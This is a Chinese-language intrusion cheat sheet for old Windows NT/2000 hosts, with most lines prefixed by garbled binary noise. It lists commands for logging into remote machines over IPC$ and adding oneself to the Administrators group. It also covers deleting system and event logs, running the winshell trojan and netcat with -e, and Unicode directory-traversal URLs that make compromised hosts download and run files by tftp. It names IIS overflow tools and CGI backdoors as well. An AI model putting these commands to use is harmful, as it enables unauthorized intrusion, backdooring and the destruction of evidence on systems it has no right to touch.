网管和黑客都必须知道的命令
kidv^`.H$w 常用的几条NET命令:
b�0N7[M1Xl h�?-��>A#� (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
bl|)/��)6o `yRt?UQ�RS (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
mJVru0���� "�1Y DT-I" (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
o�g*t�i!�Z >T\^dH�tz (查看远程主机时间) net time \\IP地址
2aUE<@RU[� dA(+02�U/. (定时启动某个程序) at \\IP地址 02:18 readme.exe
,LU�|WXRB�
�}[;r�-5} (查看共享) net view \\IP地址
Qb86����*� F�f[GR$�m� (查看netbios工作组列表) nbtstat -A IP地址
��+xYg<AFS �]��9�9;�7 (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
S'IQ�bH�z* 5�~�i��}!n (这两条把自己增加到管理员组): net user 用户名 密码 /add
3#`Sk�`z<� Te�>�m9Pav net localgroup Administrators 用户名 /add
�sA,2gb��W Pi�Nf;b^�9 (断开连接) net use \\IP地址\ipc$ /delete
=c�x_3gCr{ lO�1]P�&@� 扫尾:
�TSR�l@QVy ��RAxp2uif del C:\winnt\system32\logfiles\*.*
J@�4 Z+l9� StLbX?d��6 del C:\winnt\ssytem32\config\*.evt
AA�SS'�H@� {�-)I2GJav del C:\winnt\system32\dtclog\*.*
�FJ��|JXH* �Yj��x�4H� del C:\winnt\system32\*.log
xl(R�|D�)) �gI+d�yo�h del C:\winnt\system32\*.txt
!qs3fe<uh" �1�#v�i]CX del C:\winnt\*.txt
�!~}@Eoii4 r{Z4ifSl(� del C:\winnt\*.log
mr X�m�M<� i%r+/D)KvG 一、netsvc.exe
Z4T{CwD�`D t8�~isuiK� 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
2t#[$2mg\0 �WG5)-;>q| netsvc /list \\IP地址
�.��DhB4v& 6e��K7Jv\K netsvc schedule \\IP地址 /query
m����P./e8 �m*>gG{3�; netsvc \\IP地址 schedule /start
}F�k�F1?C� :-T[)Q+�-3 二、OpenTelnet.exe
+,4u1�`c|$ ^�
`�[T0�X 远程启动主机的Telnet服务,并绑定端口到7878,例如:
4�2PA?^xPw U�~�8, N[� OpenTelnet \\IP地址 用户名 密码 1 7878
A+"'8%o9}� Es1T{<�G|w 然后就可以telnet到主机的7878端口,进入DOS方式下:
x\Kt}/9�7e wQ�O�I�Uvd telnet IP地址 7878
"��Q1�oSpF �W`jKe�-jF 三、winshell.exe
��zm=��|#f 9f3rMP�Vh( 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
+�!-�U+��W !�<�5Wi)*� p Path (查看winshell主程序的路径信息)
�4 :M}�Vz- �Tm�LfH
d b reBoot (重新启动机器)
��1Zg�v+�. %Lfy�!]�Ru d shutDown (关闭机器)
m]A��L�W�0 W�@v��CMy! s Shell (执行后你就会看到可爱的“C:\>”)
��
4{D^ 4G �?;
t��z� x eXit (退出本次登录会话,此命令并不终止winshell的运行)
Ez��Xi*��/ "'I�|#dKoG CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
V6�^=[s �R cx*�$Ga�Mk 四、3389登陆器,GUI方式登录远程主机的
��5Ln !>,� qo:t"x��^ 五、elsave.exe
S 0�mt8/ M G[J�z(/yNH 事件日志清除工具
29f4[V� �X g�r��4JaV� elsave -s \\IP地址 -l "application" -C
r\�m2�Oo)] *NQsD C.J^ elsave -s \\IP地址 -l "system" -C
Zu/1���:8x b��%�e7rY2 elsave -s \\IP地址 -l "security" -C
�(+�;%zh-� -p� ��f9Wk 执行后成功清除应用程序日志,系统日志,安全日志
1|5Tul�jTd KwhAT�YWQb 六、hbulot.exe
mlbS�s_LT^ B�V]$�=
e' 开启win2kserver和winxp的3389服务
&5�R-�bYGW xWK�Uti �i hbulot [/r]
~{[,0,l�WU T�U�?$yNE� 使用/r表示安装完成后自动重起目标使设置生效。
-�FQS5Zb.! It5n;�,��n 七、nc.exe(netcat.exe)
_6C,w`[�[6 P^'}3��*8S 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
}K9Ji]tOK: Ve�t<,;T�e 想要连接到某处: nc [-options] hostname port[s] [ports] ...
cDh\$7'b�� #Y�B3Ug]�z 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
\,y�g��@�R /4,U@�s)"/ 参数:
Xh`O�in}�< �}Z% j=c"d -e prog 程序重定向,一旦连接,就执行 [危险!!]
�=+VI{~.|} T�V(%�e4U= -g gateway source-routing hop point[s], up to 8
q:�G3y[ P� �v�X��ib�g -G num source-routing pointer: 4, 8, 12, ...
�RH&}'4JE: �*5�R91@xt -h 帮助信息
"o�T]_WHqo ]H=P�(Z�- -i secs 延时的间隔
I7�jIA>ZZi �A�]�m_&A# -l 监听模式,用于入站连接
=B
���t�s 5z��9'~Gfb -n 指定数字的IP地址,不能用hostname
Cj�#�?Z7}z ()�y�OK�$" -o file 记录16进制的传输
/{nZ�I_v�# +!�<{�80w� -p port 本地端口号
q%w�F�=<W� W��vWZzlw -r 任意指定本地及远程端口
8���Tm/gzx u&$1XZ!e�s -s addr 本地源地址
�&A��~(9IV d��$v{oC�} -u UDP模式
0�coRar?+b
H�9rZWc"* -v 详细输出——用两个-v可得到更详细的内容
��*uM�tl'� {aWfD XB�1 -w secs timeout的时间
60�%EmX
�; f'B���#h;` -z 将输入输出关掉——用于扫描时
�j%�E�9�@# 八、TFTPD32.EXE
�StM)lVe�F 'pl){aL`@u 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
j�X
�6�+�~ f{�f��|frs http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
0vd��nM8N2 v$�bR&bC�T 然后可以直接令文件运行:
'2c4�
4F)i O<6!?1�|KP http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
��v@�
�OM� ��X>VxE/�� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
�e+P��|�PW Ix'�GP7-m_ 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
H�Zz�d�elo �5 �}�F�6s 一、一 Xscan命令行运行参数说明:
dG'5: �,n/ i@`�T_�&6l 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
%dA�7`7j�� HH,G3~EB�F 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
E��9n7P�'8 p&,�2@�(�Q xscan -file <主机列表文件名> <检测项目> [其他选项]
MA5BT��q<& cy4V�*zwp 其中<检测项目> 含义如下:
t!}?�nw%�$ h5�R5FzY0& -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
y5��bE�LWA �+�Ek('KOF -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
^�LJ�?GJ$g �'aW�<C��> -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
s�7TV�@�Y) �<y5f[HjLy -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
xT�1{��O�` wXxk�+DV@� -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
OM��
5h>\9 zMQ|j_�l9E [其他选项] 含义如下:
Y�Ks^aQm#� /4n�:!6r�t -v: 显示详细扫描进度
G�r?[s'Ze� �d���6hs�o -p: 跳过Ping不通的主机
Zf%6U[{ �T g>*�t�"Rf: -o: 跳过没有检测到开放端口的主机
:X;AmLf`2u z!6:D�t6^� -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
